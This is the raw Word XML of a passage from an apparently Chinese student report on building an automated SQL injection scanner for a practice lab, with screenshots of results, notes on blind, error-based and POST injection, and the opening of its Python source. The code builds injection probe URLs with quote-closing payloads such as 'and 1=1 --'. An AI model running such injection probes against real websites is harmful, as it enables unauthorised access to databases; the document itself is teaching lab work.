          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>【运行结果】</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CECA1C7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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4733744F" wp14:editId="1C01E699">
            <wp:extent cx="5813425" cy="7029450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="5EC342D67CC32D7DE9C0E9FED54E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EC342D67CC32D7DE9C0E9FED54E94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4394" cy="70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3CE9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14:paraId="19B8B859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0FF844A4" wp14:editId="426DFEE0">
            <wp:extent cx="5796915" cy="7415530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="A}9URAJPI~QM@YBX1_`Y0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}9URAJPI~QM@YBX1_`Y0W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683" cy="74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F1FE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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4477F0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10D7B32A" wp14:editId="3E01194A">
            <wp:extent cx="5268595" cy="7326630"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1270"/>
            <wp:docPr id="21" name="图片 21" descr="N$PSS{KS3)5$]SI@Y`W59%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N$PSS{KS3)5$]SI@Y`W59%K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03C9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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19300871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62C0A965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142F7970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7C5266D2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003F7BC8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1E7C53F1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22AD0571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4B340D37" wp14:editId="26EBCEF3">
            <wp:extent cx="6472555" cy="7825740"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10160"/>
            <wp:docPr id="22" name="图片 22" descr="C%DZU2QSXLMZ${3[1@W27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%DZU2QSXLMZ${3[1@W27N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8D73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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D66F9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6A440B0A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3F6EFD32" wp14:editId="1FF4347E">
            <wp:extent cx="6037580" cy="4634230"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="CFBA3]7AXSJE_RZSDA7T3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FBA3]7AXSJE_RZSDA7T33F"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect l="108" r="34771" b="-7124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5B65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9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71870695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64147A9D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768E8AA1" wp14:editId="55693FEB">
            <wp:extent cx="5271770" cy="5403850"/>
            <wp:effectExtent l="0" t="0" r="11430" b="6350"/>
            <wp:docPr id="24" name="图片 24" descr="$00GE5JM_24IMMT@KZG`[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$00GE5JM_24IMMT@KZG`[EI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B5E0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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E07E0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41C5F6E8" wp14:editId="629E08A2">
            <wp:extent cx="5593715" cy="4549775"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="25" name="图片 25" descr="4IQ`$U4YIDB{}$K1UDF}C%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4IQ`$U4YIDB{}$K1UDF}C%M"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect l="-434" t="-969" r="36844" b="-14459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EA60" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C5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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC4D96" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA"/>
    <w:p w14:paraId="1F695A72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63BE0D56" wp14:editId="0D1277F5">
            <wp:extent cx="5250815" cy="3656330"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1270"/>
            <wp:docPr id="26" name="图片 26" descr="0(83MTI8O5@{[]YPV1E48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0(83MTI8O5@{[]YPV1E48HI"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect r="44285" b="1348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90EC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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27687A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31DFF9BF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787CDDBD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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1890B212" wp14:editId="020C1BA2">
            <wp:extent cx="5271135" cy="4057015"/>
            <wp:effectExtent l="0" t="0" r="12065" b="6985"/>
            <wp:docPr id="27" name="图片 27" descr="_EFAG()%60)DD560PGDNI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_EFAG()%60)DD560PGDNI0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9531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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F6A9E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06FA05DF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40BFE0A7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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="258CC715" wp14:editId="24BE3112">
            <wp:extent cx="5268595" cy="3995420"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="28" name="图片 28" descr="0C0`43}PCB)]0BK[XS47U}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0C0`43}PCB)]0BK[XS47U}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39B1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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523F8AB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400788E5" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl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</w:p>
    <w:p w14:paraId="7C1B8BAF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2F6D521D" wp14:editId="0FF3DC75">
            <wp:extent cx="6671945" cy="7260590"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3810"/>
            <wp:docPr id="32" name="图片 32" descr="(HH]Q%WS~`LN]IPD`F91F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(HH]Q%WS~`LN]IPD`F91FN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B840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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B5CDF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195D37A4" wp14:editId="282C5ED4">
            <wp:extent cx="6391275" cy="7524750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:docPr id="31" name="图片 31" descr="J6UXFN5]A)@X4~8J586D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J6UXFN5]A)@X4~8J586DUG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A6E3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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D1E12" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="宋体" w:cs="黑体" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="493EB319" wp14:editId="056995E2">
            <wp:extent cx="6260465" cy="8242300"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="34" name="图片 34" descr="(VUOP_S)~O7PF8P7MH@05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(VUOP_S)~O7PF8P7MH@05ZQ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694" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573154E4" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:keepNext/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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3EA7C3BC" wp14:editId="450CEBD2">
            <wp:extent cx="5672455" cy="6353175"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="33" name="图片 33" descr="WLAU(V)F32U)1%}V5O8Q0]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WLAU(V)F32U)1%}V5O8Q0]X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9233" cy="636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829A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A90446" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1598FE" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc104974582"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>【心得体会】</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739B1E84" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="400" w:lineRule="exact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（1）在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lang w:bidi="ar"/>
        </w:rPr>
        <w:t>进行盲注时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lang w:bidi="ar"/>
        </w:rPr>
        <w:t>，可以根据页面中的f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>lag.jpg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和slap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.jpg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图片来判断payload是否使得当前页面正确显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE95E2" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/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2）在进行报错注入时，由于报错函数最后并不能回显过多的数据，所以需要先判断数据的行数，然后在循环中报错</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注入回显每</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一行的数据，并整合到一个结构中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF8B02D" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="宋体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ost注入类型的payload在构造时只能使用#注释符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8BAD94" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="400" w:lineRule="exact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（4）在进行注入时，要先判断究竟是什么类型，每种类型有什么特点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ECABA" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/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由于传入的参数在拼接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://so.csdn.net/so/search?q=sqL%E8%AF%AD%E5%8F%A5&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/cppppt/article/details/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqL语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时，其中注入了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>能执行的指令作为参数导致执行的结果数据不正确，会出现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注入安全问题，因此要对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行预先编译。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440411BE" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/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7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在设计GET类型注入的功能模块过程期间：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B298D7F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/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ab/>
        <w:t>部分关卡使用带有URL编码的Payload进行HTTP请求时无法接收到响应内容，经检查发现Python中的HTTP请求API会对URL编码甚至空格进行预编码，因此无需再使用URL编码；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34263B6C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/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ab/>
        <w:t>在涉及到自动化扫描关卡的条件判断时，出现多种注入类型用于同一关卡，导致了自动扫描效率的大幅降低，对此进行判断条件的严格把控，问题得以解决；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C2627F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/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ab/>
        <w:t>在设计的后期发现</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>盲注部分</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对闭合类型的扫描过于单一，于是添加了多种闭合情况集成来进行遍历判断的功能，问题得以解决。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714967D1" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2820BA48" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9731A7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655890CF" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B8376F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633355D1" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4370317B" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="878"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42270D81" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3DF530" w14:textId="2BF9C450" w:rsidR="00B2088F" w:rsidRDefault="00B2088F">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27ED08CE" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D9855" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519DBFB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qli</w:t>
      </w:r>
      <w:r>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1903A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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACE9F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bs4 import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7299791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urllib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7033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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.gets.bool_based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool_based_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61D3B7C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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.gets.time_based_module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time_based_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="123E938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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.posts.union_bsd_plus_err</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_injection_post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05AF79E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termcolor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import colored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3E8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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55E4AB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23324665" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC3551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def log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A49A1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time.strftime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('%H:%H:%S', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.local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ime.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB74CE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colored('[' + str(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>) + '] ', 'green') + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EF644" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470A6432" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B2B5A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06F0435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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request.urlopen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4A54B2A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str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>res.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55A9A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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A1302" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4597F510" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A14FA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can_injec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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478FE7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 xml:space="preserve"> = ['%27', '%27%29', '%22', '%22%29']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7554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item in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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F5F2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target_url1 =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 str(item) + '%20and%201=1%20--+'</w:t>
      </w:r>
    </w:p>
